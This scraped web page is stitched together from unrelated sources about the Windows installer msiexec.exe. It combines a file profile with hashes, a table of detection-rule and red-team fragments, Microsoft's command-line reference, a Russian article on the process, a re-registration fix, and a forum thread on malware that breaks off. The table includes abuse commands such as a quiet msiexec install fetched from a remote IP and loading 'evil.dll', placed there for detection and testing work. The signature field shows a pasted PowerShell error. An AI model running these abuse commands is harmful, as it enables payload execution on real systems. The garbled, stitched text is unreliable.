C windows syswow64 msiexec exe

  • File Path: C:\windows\SysWOW64\msiexec.exe
  • Description: Windows installer

Screenshot

Hashes

Type Hash
MD5 33B2E4E3E4D6DCF296FD0B7C0843AB3F
SHA1 F657B1725214EBD6FAAB0DEF0D79183B5DE89FA5
SHA256 D88E2D981610EA24EE22B83CC284D6C616F3674E8F1F5D3794C9FCD569E8DADD
SHA384 894DD3E761895C32F4C0281B39DAF7807A25F0CE4D9C95D07D3F459CC368031C6BC0538F96017AE242C23766C216C071
SHA512 82B01B7B89E535E3A39C2751303FDDA1114039BD2346CAD9B4402F85D4BE08FDDA4B2133D826F1A708FD1E64AB4197EFD384AF7DF150ABAA5131AF36A683E392
SSDEEP 768:U1SJQu5Ux7K5kUfEvRRAZ4nwoouXzeI619TNplGYCj55/3bF6dCeYOnE:U1Sk7K6ZRBouXzeNoY8n/LFji

Signature

  • Status: The file C:\windows\SysWOW64\msiexec.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: «
  • Thumbprint: «
  • Issuer:
  • Subject:
  • Original Filename: msiexec.exe.mui
  • Product Name: Windows Installer — Unicode
  • Company Name: Microsoft Corporation
  • File Version: 5.0.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 5.0.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of msiexec.exe being misused. While msiexec.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\msiexec.exe' DRL 1.0
sigma win_firewall_as_add_rule.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma win_alert_lsass_access.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma win_alert_lsass_access.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\msiexec.exe' DRL 1.0
sigma file_event_win_cve_2021_41379_msi_lpe.yml description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file DRL 1.0
sigma file_event_win_cve_2021_41379_msi_lpe.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - https://twitter.com/SBousseaden/status/1388064061087260675 - rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml # - '\msiexec.exe' an installer installing a program using one of those DLL will raise an alert DRL 1.0
sigma image_load_suspicious_vss_ps_load.yml - '\msiexec.exe' DRL 1.0
sigma net_connection_win_msiexec.yml title: Msiexec Initiated Connection DRL 1.0
sigma net_connection_win_msiexec.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma net_connection_win_msiexec.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma net_connection_win_msiexec.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma net_connection_win_msiexec.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma net_connection_win_msiexec.yml - Legitimate msiexec over networks DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - 'C:\Windows\syswow64\MsiExec.exe' DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma proc_access_win_svchost_cred_dump.yml - '*\msiexec.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml description: This rule looks for Windows Installer service (msiexec.exe) spawned command line and/or powershell DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml description: This rule looks for Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml - CommandLine\|endswith: '\system32\msiexec.exe /V' # ignore "repair option" DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml - ParentCommandLine\|endswith: '\system32\msiexec.exe /V' # ignore "repair option" DRL 1.0
sigma proc_creation_win_attrib_hiding_files.yml - msiexec.exe hiding desktop.ini DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml title: Suspicious Msiexec Execute Arbitrary DLL DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll' DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml title: Suspicious Msiexec Quiet Install DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*msiexec*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml ParentImage\|endswith: ':\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml CommandLine\|startswith: 'C:\Windows\syswow64\MsiExec.exe -Embedding' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml title: Suspicious MsiExec Directory DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml description: Detects suspicious msiexec process starts in an uncommon directory DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml title: MsiExec Web Install DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml description: Detects suspicious msiexec process starts with web addresses as parameter DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml - ' msiexec' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\msiexec.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_winsock2.yml - Image: 'C:\Windows\System32\MsiExec.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_winsock2.yml - Image: 'C:\Windows\syswow64\MsiExec.exe' DRL 1.0
sigma registry_event_office_vsto_persistence.yml - '\msiexec.exe' DRL 1.0
sigma registry_event_ssp_added_lsa_config.yml - Image: C:\Windows\system32\msiexec.exe DRL 1.0
sigma registry_event_ssp_added_lsa_config.yml - Image: C:\Windows\syswow64\MsiExec.exe DRL 1.0
sigma registry_event_vbs_payload_stored.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes DRL 1.0
sigma sysmon_always_install_elevated_parent_child_correlated.yml description: This rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege DRL 1.0
sigma sysmon_always_install_elevated_parent_child_correlated.yml Image\|endswith: '\msiexec.exe' DRL 1.0
LOLBAS Msiexec.yml Name: Msiexec.exe  
LOLBAS Msiexec.yml - Command: msiexec /quiet /i cmd.msi  
LOLBAS Msiexec.yml - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png  
LOLBAS Msiexec.yml - Command: msiexec /y "C:\folder\evil.dll"  
LOLBAS Msiexec.yml - Command: msiexec /z "C:\folder\evil.dll"  
LOLBAS Msiexec.yml - Path: C:\Windows\System32\msiexec.exe  
LOLBAS Msiexec.yml - Path: C:\Windows\SysWOW64\msiexec.exe  
LOLBAS Msiexec.yml - IOC: msiexec.exe retrieving files from Internet  
LOLBAS Msiexec.yml - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/  
atomic-red-team index.md — T1218.007 Msiexec MIT License. © 2018 Red Canary
atomic-red-team index.md — Atomic Test #1: Msiexec.exe — Execute Local MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md — Atomic Test #2: Msiexec.exe — Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md — Atomic Test #3: Msiexec.exe — Execute Arbitrary DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md — T1218.007 Msiexec MIT License. © 2018 Red Canary
atomic-red-team windows-index.md — Atomic Test #1: Msiexec.exe — Execute Local MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md — Atomic Test #2: Msiexec.exe — Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md — Atomic Test #3: Msiexec.exe — Execute Arbitrary DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Scheduled Task | Thread Execution Hijacking CONTRIBUTE A TEST | Msiexec | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Security Support Provider | Token Impersonation/Theft | Msiexec | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1047.md msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart MIT License. © 2018 Red Canary
atomic-red-team T1072.md msiexec /i “#{radmin_installer}” /qn MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md # T1218.007 — Msiexec MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md <blockquote>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md — Atomic Test #1 — Msiexec.exe — Execute Local MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md — Atomic Test #2 — Msiexec.exe — Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md — Atomic Test #3 — Msiexec.exe — Execute Arbitrary DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #1 — Msiexec.exe — Execute Local MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md msiexec.exe /q /i “#{msi_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #2 — Msiexec.exe — Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #3 — Msiexec.exe — Execute Arbitrary DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md msiexec.exe /y “#{dll_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1219.md Msiexec will be used to quietly insall ScreenConnect. MIT License. © 2018 Red Canary
atomic-red-team T1219.md msiexec /i $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1219.md msiexec /x $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1555.003.md msiexec /i $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md msiexec /x #{msi_file_path} /qn MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md msiexec /i #{msi_file_path} /qn MIT License. © 2018 Red Canary
signature-base apt_apt29_nobelium_may21.yar Not shared publicly: rules for CobaltStrike loader samples, ISOs, specifc msiexec method found in some samples CC BY-NC 4.0
signature-base apt_blackenergy.yar $s2 = “msiexec.exe” fullword wide CC BY-NC 4.0
signature-base apt_win_plugx.yar $s2 = “%s\msiexec.exe %d %d” fullword wide CC BY-NC 4.0
signature-base apt_win_plugx.yar $s4 = “%s\msiexec.exe UAC” fullword wide CC BY-NC 4.0
signature-base thor-hacktools.yar $x1 = “msiexec /f c:\users\%username%\downloads\” fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s2 = “Full path: C:\Windows\system32\msiexec.exe /V” fullword wide CC BY-NC 4.0
stockpile 60f63260-39bb-4136-87a0-b6c2dca799fc.yml Start-Process msiexec.exe -ArgumentList "/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1" -Wait; Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


msiexec

Provides the means to install, modify, and perform operations on Windows Installer from the command line.

Install options

Set the install type for launching an installation package.

Syntax

msiexec.exe [/i][/a][/j{u|m|/g|/t}][/x] <path_to_package>
Parameters
Parameter Description
/i Specifies normal installation.
/a Specifies administrative installation.
/ju Advertise the product to the current user.
/jm Advertise the product to all users.
/j/g Specifies the language identifier used by the advertised package.
/j/t Applies transform to the advertised package.
/x Uninstalls the package.
<path_to_package> Specifies the location and name of the installation package file.
Examples

To install a package named example.msi from the C: drive, using a normal installation process, type:

msiexec.exe /i "C:\example.msi"

Display options

You can configure what a user sees during the installation process, based on your target environment. For example, if you’re distributing a package to all clients for manual installation, there should be a full UI. However, if you’re deploying a package using Group Policy, which requires no user interaction, there should be no UI involved.

Syntax

msiexec.exe /i <path_to_package> [/quiet][/passive][/q{n|b|r|f}]
Parameters
Parameter Description
<path_to_package> Specifies the location and name of the installation package file.
/quiet Specifies quiet mode, which means there’s no user interaction required.
/passive Specifies unattended mode, which means the installation only shows a progress bar.
/qn Specifies there’s no UI during the installation process.
/qn+ Specifies there’s no UI during the installation process, except for a final dialog box at the end.
/qb Specifies there’s a basic UI during the installation process.
/qb+ Specifies there’s a basic UI during the installation process, including a final dialog box at the end.
/qr Specifies a reduced UI experience during the installation process.
/qf Specifies a full UI experience during the installation process.
  • The modal box isn’t shown if the installation is cancelled by the user. You can use qb+! or qb!+ to hide the CANCEL button.
Examples

To install package C:\example.msi, using a normal installation process and no UI, type:

msiexec.exe /i "C:\example.msi" /qn

Restart options

If your installation package overwrites files or attempts to change files that are in use, a reboot might be required before the installation completes.

Syntax

msiexec.exe /i <path_to_package> [/norestart][/promptrestart][/forcerestart]
Parameters
Parameter Description
<path_to_package> Specifies the location and name of the installation package file.
/norestart Stops the device from restarting after the installation completes.
/promptrestart Prompts the user if a reboot is required.
/forcerestart Restarts the device after the installation completes.
Examples

To install package C:\example.msi, using a normal installation process with no reboot at the end, type:

msiexec.exe /i "C:\example.msi" /norestart

Logging options

If you need to debug your installation package, you can set the parameters to create a log file with specific information.

Syntax

msiexec.exe [/i][/x] <path_to_package> [/L{i|w|e|a|r|u|c|m|o|p|v|x+|!|*}] <path_to_log>
Parameters
Parameter Description
/i Specifies normal installation.
/x Uninstalls the package.
<path_to_package> Specifies the location and name of the installation package file.
/li Turns on logging and includes status messages in the output log file.
/lw Turns on logging and includes non-fatal warnings in the output log file.
/le Turns on logging and includes all error messages in the output log file.
/la Turns on logging and includes information about when an action started in the output log file.
/lr Turns on logging and includes action-specific records in the output log file.
/lu Turns on logging and includes user request information in the output log file.
/lc Turns on logging and includes the initial UI parameters in the output log file.
/lm Turns on logging and includes out-of-memory or fatal exit information in the output log file.
/lo Turns on logging and includes out-of-disk-space messages in the output log file.
/lp Turns on logging and includes terminal properties in the output log file.
/lp Turns on logging and includes terminal properties in the output log file.
/lv Turns on logging and includes verbose output in the output log file.
/lp Turns on logging and includes terminal properties in the output log file.
/lx Turns on logging and includes extra debugging information in the output log file.
/l+ Turns on logging and appends the information to an existing log file.
/l! Turns on logging and flushes each line to the log file.
/l* Turns on logging and logs all information, except verbose information (/lv) or extra debugging information (/lx).
<path_to_logfile> Specifies the location and name for the output log file.
Examples

To install package C:\example.msi, using a normal installation process with all logging information provided, including verbose output, and storing the output log file at C:\package.log, type:

msiexec.exe /i "C:\example.msi" /L*V "C:\package.log"

Update options

You can apply or remove updates using an installation package.

Syntax

msiexec.exe [/p][/update][/uninstall[/package<product_code_of_package>]] <path_to_package>
Parameters
Parameter Description
/p Installs a patch. If you’re installing silently, you must also set the REINSTALLMODE property to ecmus and REINSTALL to ALL. Otherwise, the patch only updates the MSI cached on the target device.
/update Install patches option. If you’re applying multiple updates, you must separate them using a semi-colon (;).
/package Installs or configures a product.
Examples
msiexec.exe /p "C:\MyPatch.msp"
msiexec.exe /p "C:\MyPatch.msp" /qb REINSTALLMODE="ecmus" REINSTALL="ALL"
msiexec.exe /update "C:\MyPatch.msp"
msiexec.exe /uninstall {1BCBF52C-CD1B-454D-AEF7-852F73967318} /package {AAD3D77A-7476-469F-ADF4-04424124E91D}

Where the first GUID is the patch GUID, and the second one is the MSI product code to which the patch was applied.

Repair options

You can use this command to repair an installed package.

Syntax

msiexec.exe [/f{p|o|e|d|c|a|u|m|s|v}] <product_code>
Parameters
Parameter Description
/fp Repairs the package if a file is missing.
/fo Repairs the package if a file is missing, or if an older version is installed.
/fe Repairs the package if file is missing, or if an equal or older version is installed.
/fd Repairs the package if file is missing, or if a different version is installed.
/fc Repairs the package if file is missing, or if checksum does not match the calculated value.
/fa Forces all files to be reinstalled.
/fu Repairs all the required user-specific registry entries.
/fm Repairs all the required computer-specific registry entries.
/fs Repairs all existing shortcuts.
/fv Runs from source and re-caches the local package.
Examples

To force all files to be reinstalled based on the MSI product code to be repaired, {AAD3D77A-7476-469F-ADF4-04424124E91D}, type:

msiexec.exe /fa {AAD3D77A-7476-469F-ADF4-04424124E91D}

Set public properties

You can set public properties through this command. For information about the available properties and how to set them, see Public Properties.

Additional References

  • Command-Line Syntax Key

  • Msiexec.exe Command-Line Options

  • Standard Installer Command-Line Options


MIT License. Copyright (c) 2020-2021 Strontic.

Все способы:

  • Сведения о процессе
    • Функции
    • Расположение файла
    • Завершение процесса
    • Процесс работает постоянно
    • Подмена вредоносным ПО
  • Вопросы и ответы: 6

MSIEXEC.EXE – процесс, который иногда может включаться на Вашем ПК. Давайте разберемся, за что он отвечает и можно ли его отключить.

Сведения о процессе

Увидеть MSIEXEC.EXE можно во вкладке «Процессы» Диспетчера задач.

Процесс MSIEXEC.EXE в Диспетчере задач

Функции

Системная программа MSIEXEC.EXE является разработкой Microsoft. Она связана с Установщиком Windows и используется для установки новых программ из файла в формате MSI.

Работать MSIEXEC.EXE начинает при запуске установщика, и должен сам завершаться по окончании процесса инсталляции.

Расположение файла

Программа MSIEXEC.EXE должна располагаться по следующему пути:

C:\Windows\System32

Убедиться в этом можно, нажав «Открыть место хранения файла» в контекстном меню процесса.

Переход к месту хранения файла в Диспетчере задач

После этого откроется папка, где располагается данный EXE-файл.

Место хранения MSIEXEC.EXE

Завершение процесса

Останавливать работу данного процесса не рекомендуется, особенно при выполнении установки ПО на Ваш компьютер. Из-за этого будет прервана распаковка файлов и новая программа наверняка не будет работать.

Если же необходимость выключения MSIEXEC.EXE всё же возникла, то сделать это можно следующим образом:

  1. Выделите этот процесс в перечне Диспетчера задач.
  2. Нажмите кнопку «Завершить процесс».
  3. Завершение MSIEXEC.EXE в Диспетчере задач

  4. Ознакомьтесь с появившимся предупреждением и снова нажмите «Завершить процесс».
  5. Предупреждение при завершении процесса

Процесс работает постоянно

Бывает, что MSIEXEC.EXE начинает работать при каждом запуске системы. В этом случае стоит проверить статус службы «Установщик Windows» – возможно, по какой-то причине она запускается автоматически, хотя по умолчанию должно быть ручное включение.

  1. Запустите программу «Выполнить», используя комбинацию клавиш Win+R.
  2. Пропишите «services.msc» и нажмите «ОК».
  3. Вызов Служб в Windows

  4. Отыщите службу «Установщик Windows». В графе «Тип запуска» должно стоять значение «Вручную».
  5. Служба Установщик Windows

В противном случае дважды щёлкните по её названию. В появившимся окне свойств можно увидеть название уже знакомого нам исполняемого файла MSIEXEC.EXE. Нажмите кнопку «Остановить», измените тип запуска на «Вручную» и кликните «ОК».

Изменение свойств службы Установщик Windows

Подмена вредоносным ПО

Если Вы ничего не устанавливаете и служба работает как нужно, то под MSIEXEC.EXE может маскироваться вирус. Среди других признаков можно выделить:

  • повышенную нагрузку на систему;
  • подмену некоторых символов в имени процесса;
  • исполняемый файл хранится в другой папке.

Избавиться от вредоносного ПО можно, просканировав компьютер с помощью антивирусной программы, например, Dr.Web CureIt. Также можно попытаться удалить файл, загрузив систему в Безопасном режиме, но Вы должны быть уверены, что это вирус, а не системный файл.

На нашем сайте вы можете узнать о том, как запустить в безопасном режиме Windows XP, Windows 8 и Windows 10.

Читайте также: Проверка компьютера на вирусы без антивируса

Итак, мы выяснили, что MSIEXEC.EXE работает при запуске установщика с расширением MSI. В этот период его лучше не завершать. Запускаться этот процесс может по причине неверных свойств службы «Установщик Windows» или из-за наличия на ПК вредоносного ПО. В последнем случае нужно своевременно решить проблему.

Наша группа в TelegramПолезные советы и помощь

Have you tried to install a program in Windows 7 that uses an MSI file as its installer and instead you saw the above error? Never fear. There is an easy solution and we’re here to help you with it.

First, click on the Start menu and select Run.

NOTE: If you don’t see the Run command on the Start menu, see our article about adding the Run command to the Start menu.

01_selecting_run_from_start_menu

In the Open edit box on the Run dialog box, enter «cmd» (without the quotes) and click OK.

02_entering_cmd_in_run_dialog

The Command Prompt window displays. For 64-bit Windows, type the following at the prompt and press Enter.

%windir%\system32\msiexec.exe /unregister

This unregisters the msiexec.exe file in the C:\Windows\system32 directory.

NOTE: We will show you the commands to enter for 32-bit Windows at the end of the article.

03_unregister_in_system32

Type the following at the prompt and press Enter.

%windir%\system32\msiexec.exe /regserver

This re-registers the msiexec.exe file in the C:\Windows\system32 directory.

04_regserver_in_system32

Type the following at the prompt and press Enter.

%windir%\syswow64\msiexec.exe /unregister

This unregisters the msiexec.exe file in the C:\Windows\syswow64 directory.

05_unregister_in_syswow64

Type the following at the prompt and press Enter.

%windir%\syswow64\msiexec.exe /regserver

This re-registers the msiexec.exe file in the C:\Windows\syswow64 directory.

06_regserver_in_syswow64

To close the Command Prompt window, type «exit» (without the quotes) at the prompt and press Enter.

07_closing_cmd_window

Reboot your computer. You should now be able to install programs that use MSI installer files.

To fix this problem in 32-bit Windows, open the Command Prompt window as described above. Type the following commands in order, pressing Enter after each:

msiexec /unregister

msiexec /regserver

Exit the Command Prompt window and reboot your computer to complete the fix.

Windows 10: msiexec.exe in SYSWOW64 folder detected as virus, but removing it causes installation…

Discus and support msiexec.exe in SYSWOW64 folder detected as virus, but removing it causes installation… in Windows 10 Gaming to solve the problem; Windows Defender has detected the msiexec.exe in SYSWOW64 folder as a virus. I followed the procedure to remove it from the computer, but because it’s…
Discussion in ‘Windows 10 Gaming’ started by D_A_Renoir, Jul 6, 2023.

  1. msiexec.exe in SYSWOW64 folder detected as virus, but removing it causes installation…

    Windows Defender has detected the msiexec.exe in SYSWOW64 folder as a virus. I followed the procedure to remove it from the computer, but because it’s gone, the computer cannot complete installation process anymore. I submitted it to Microsoft Security Intelligence, thinking that it might have nabbed a valid software by mistake, and the analysis says that it actually is a malware.I rescanned my computer over and over, and it all came out clean except for this. Suppose it’s a legitimate Windows service that got infected by virus, what should I do? If I remove it, it would make the installer mal

    :)

  2. SysWOW64

    Scanned and quarantined by what? Please provide the full name of the detection and the location where it was found. I suspect that you are providing part of the infection location or name.

    In 64 bit versions of Windows, there is a folder by this name containing files used by the operating system:

    C:\Windows\SysWOW64

    The ‘Program Files (x86)’ and ‘SysWOW64’ folders explained / Windows 64-bit (Technical Article)

    On the other hand, do a web search for «SysWOW64 Virus» and you’ll be faced with a slew of bogus virus removal sites designed to sell you their bogus services or programs to «fix» the «dangerous» virus. In fact, your original post mentions tools that scan
    your PC to report a million problems that want you to pay for removal/repair — that’s exactly what you will find by going to any of the sites in the search results for this…

    There are viruses that will infect files within this folder. To provide assistance in removal, we’d need to know what was actually detected and by what.

    -steve

  3. Guide: Virus Removal 101

    Software and Background
    In this section we will briefly go over the software being used and why we chose this software as opposed to other options. This is more of an academic type of post that will clarify the more important «WHY» when it comes to removal. It is important to understand that in order to effectively remove or have the best chance too remove a virus you must have the proper tools. The software listed below is based on several key points. Those mostly being.

    • Free
    • Easy to use
    • Minimal user interaction
    • Update friendly

    At no point should you think that the software chosen was chosen because it is better than xyz or the «Best». That doesn’t mean the software is «not the best» just that I am trying to break the mindset of «Best» it is important to shake the idea that a one off solution is always going to be the better one.

    A Porsche is fast and will get you to work sooner than an 18 wheeler but if your hauling tractors to work the 18 wheeler is better suited. This is no different in the security world applications are built for a specific purpose for the most part and because of the nature of heuristic code engines some software will do better than others even if it is the same area of interest.

    Software List
    Threat Restraint

    • Rkill

    Rootkit Removers

    • TDSS
    • bootkitremover
    • MBAR

    Broad Spectrum Scanners

    • Roguekiller
    • EEK
    • MBAM
    • Sophos VRT
    • HitmanPro

    Malware/Junkware Removers

    • ADWCleaner
    • JRT

    Targeted Repairs

    • Powerliks
    • Combofix

    Wrap-up and Repair

    • TWEAK
    • REVOuninstaller
    • Ccleaner

    Examples

    Above is the list of software this guide will cover and what you will be using to disinfect the machine in question. Now; we will go more into why we separate them into groups in the next section. Here I will explain weakness and strength between software types and programs so you can understand why there are so many.

    A common question is why don’t we have a 1 all solution paid or otherwise that can handle all of well…all of this. The answer is simple.

    You can’t.

    Every virus removal tool is different in some way. Some are able to detect things others can not. Above are the groups of different software. For example EEK is a broad spectrum scanner. However EEK cannot detect rootkits as well as programs specifically designed to remove rootkits like TDSS. Likewise Programs like TDSS are completely incapable of detecting malware, it simply isn’t programmed for it.

    Software in the same category also behaves differently. Hitman is very good at detecting browser issues and cookies. However Sophos isn’t so great at browser infections but is better at scanning core system folders.

    The AV world is full of these kinds of checks and balances which makes proper removal more of a skill than a click of a few buttons. Nothing is 100% and you must rely on the differences the tools have to increase your chances of success.

    Running scans in order

    Running scans in the correct order might be something you are unfamiliar with. I will try to break down the basic concept as to why this is important to you. For the most part it boils down to permissions. Be it actual NTFS permissions or actual Privilege. Digging deeper you should ALWAYS attack an infection in this order.

    • Threat restraint

    Threat restraint is an important step because it will allow you the user to more easily work with your machine which is probably super slow because of infection. Using programs like killemall or Rkill stop known malware processes which free up memory and CPU making it a little easier and faster to deal with your machine.

    • Root/Boot Kits

    As previously covered Root and Bootkits are low level infections that grant admin (root) access to the machine. This software also for the most part changes permissions of core system files in order to more easily control your machine. It is very important to target and remove these infections first because the modifications they make can stop other higher level removal tools from working correctly.

    • Virus Scans

    Actual Virus removal comes next. Trojans, worms, spyware all virus class infections cause some kind of issues with system services, built in security protection and have the ability to prevent removal tools from opening. These kinds of infections need to be delt with second so that we can ease the restraints on the system so that our tools have the proper permissions and resources to run.

    • Mal/Junkware scans

    These are the last class of tools to run. These infections usually adhere to the user level of least privilege. They are really annoying and bothersome but are usually the most simple to remove. Unfortunately the tools that remove them require the use of system resources most of the time and assume they have everything they need to proceed. For this reason malware and junkware removal scans are done last because they totally rely on the previous steps being done and corrected to run correctly.

    • Repair

    Repair tools like tweak are used last. These programs reset windows to a default usable state. From folder options and icon size to default services and program startup. Most of the virus removal tools correct security related issues that the virus they are removing affected.

    However sometimes more things have been touched and damaged and for these we use repair software last to correct the remaining issues after a full removal.

  4. msiexec.exe in SYSWOW64 folder detected as virus, but removing it causes installation…

